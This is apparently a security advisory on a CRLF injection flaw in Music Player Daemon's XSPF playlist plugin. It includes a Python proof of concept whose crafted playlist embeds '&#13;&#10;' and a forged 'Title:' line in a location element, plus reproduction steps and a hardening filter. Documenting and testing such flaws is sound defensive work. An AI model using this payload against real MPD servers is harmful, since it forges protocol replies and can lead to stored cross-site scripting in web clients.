Music Player Daemon CRLF Injection Vulnerability in XSPF Playlist Plugin

Vulnerability

A CRLF injection vulnerability has been identified in Music Player Daemon (MPD) versions prior to 0.24.11. The issue resides in the XSPF playlist plugin, specifically in the 'xspf_char_data' callback that collects the text of a track's 'location' element. Expat decodes XML numeric character references (for example '&#13;' and '&#10;') before it invokes the character data callback, so a malicious XSPF playlist can deliver literal carriage return and line feed bytes, which the plugin accepted into the URI field unfiltered. Because the MPD protocol is line-oriented and reports each attribute as a 'key: value' line, a URI containing CR/LF lets an attacker inject forged key-value lines into protocol responses such as 'playlistinfo', 'currentsong', and 'listplaylist'. The same bytes can also disrupt the state file writer.
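The mechanism above, as an added example that is not MPD's own code: Python's xml.parsers.expat module is a binding to the same Expat library the XSPF plugin uses, so it shows directly that '&#13;&#10;' arrives in the character data callback as literal CR and LF. The playlist strings, the toy 'playlistinfo' formatter and the client-side parser are constructed for illustration; the control-character filter is a plausible hardening, not necessarily the exact change shipped in 0.24.11.

```python
import xml.parsers.expat

# Constructed XSPF playlists (not real-world samples). The malicious one puts
# &#13;&#10; (CR LF) followed by text shaped like an MPD 'key: value' line
# inside <location>; the benign one is the same file with a plain URI.
MALICIOUS_XSPF = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<playlist version="1" xmlns="http://xspf.org/ns/0/">\n'
    '  <trackList>\n'
    '    <track>\n'
    '      <location>http://example.invalid/a.mp3&#13;&#10;'
    'Title: forged by attacker</location>\n'
    '    </track>\n'
    '  </trackList>\n'
    '</playlist>\n'
)
BENIGN_XSPF = MALICIOUS_XSPF.replace('&#13;&#10;Title: forged by attacker', '')


def parse_xspf_locations(xml_text):
    """Collect the text of every <location> element, accumulating character
    data the way a plugin's char_data callback must (Expat may deliver one
    element's text in several chunks, e.g. split around each reference).
    Expat resolves &#13;&#10; before calling the handler, so literal CR and
    LF bytes arrive here as ordinary character data."""
    locations = []
    buf = None  # None while not inside <location>

    def start(name, attrs):
        nonlocal buf
        if name == "location":
            buf = []

    def end(name):
        nonlocal buf
        if name == "location" and buf is not None:
            locations.append("".join(buf))
            buf = None

    def char_data(data):
        if buf is not None:
            buf.append(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_text, True)
    return locations


def playlistinfo_response(uris):
    """Toy model of MPD's line-oriented reply framing (one 'key: value' per
    line, terminated by OK). The real server emits more fields; only the
    framing matters for the injection."""
    lines = []
    for pos, uri in enumerate(uris):
        lines.append("file: " + uri)
        lines.append("Pos: %d" % pos)
    lines.append("OK")
    return "\n".join(lines) + "\n"


def client_parse(response):
    """How a typical client reads the reply: split into lines, then split
    each line at the first ': '. A CR/LF inside a value starts a new line,
    so the forged text is read as a separate, genuine-looking attribute."""
    pairs = []
    for line in response.splitlines():
        if line == "OK":
            break
        key, _, value = line.partition(": ")
        pairs.append((key, value))
    return pairs


def has_control_chars(s):
    """True if the string contains a C0 control character (0x00-0x1F) or DEL
    (0x7F). A URI never legitimately contains these."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in s)


def filter_locations(locations):
    """Hardened handling (an assumption about a reasonable fix, not
    necessarily the upstream change): drop any location carrying control
    characters before it can reach protocol output or the state file."""
    return [uri for uri in locations if not has_control_chars(uri)]


if __name__ == "__main__":
    bad = parse_xspf_locations(MALICIOUS_XSPF)
    print(repr(bad[0]))                            # literal '\r\n' visible
    print(client_parse(playlistinfo_response(bad)))  # forged 'Title' pair
    print(filter_locations(bad))                   # [] once hardened
```

Running the script shows the forged 'Title' attribute appearing to the client as a normal line of the reply, and the filter discarding the poisoned location while leaving the benign playlist untouched.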

Impact

Exploitation of this vulnerability leads to CRLF injection, allowing attackers to forge lines in MPD's protocol responses. Clients that parse replies line by line will read the forged lines as genuine attributes, which can confuse them and break applications that scrape MPD's output. Furthermore, for web clients that render playlist information into HTML without proper escaping, the forged fields introduce a stored cross-site scripting (XSS) risk.

Reproduction

To reproduce this vulnerability, place an XSPF playlist whose 'location' element contains numeric character references for carriage return and line feed (for example '&#13;&#10;' followed by a forged 'key: value' line) where the MPD instance can load it. Then, using an MPD client, load the playlist and request 'playlistinfo', 'currentsong', or 'listplaylist'; the response contains the injected line breaks and the forged line.

Remediation

Users can update to MPD version 0.24.11 or later, where this vulnerability has been fixed.

Added: May 28, 2026, 9:16 PM
Updated: May 28, 2026, 9:16 PM

Vulnerability Rating

Custom Algorithm

spread          2.6
impact          0.6
exploitability  7.6
remediation     7.7
relevance       9.2
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.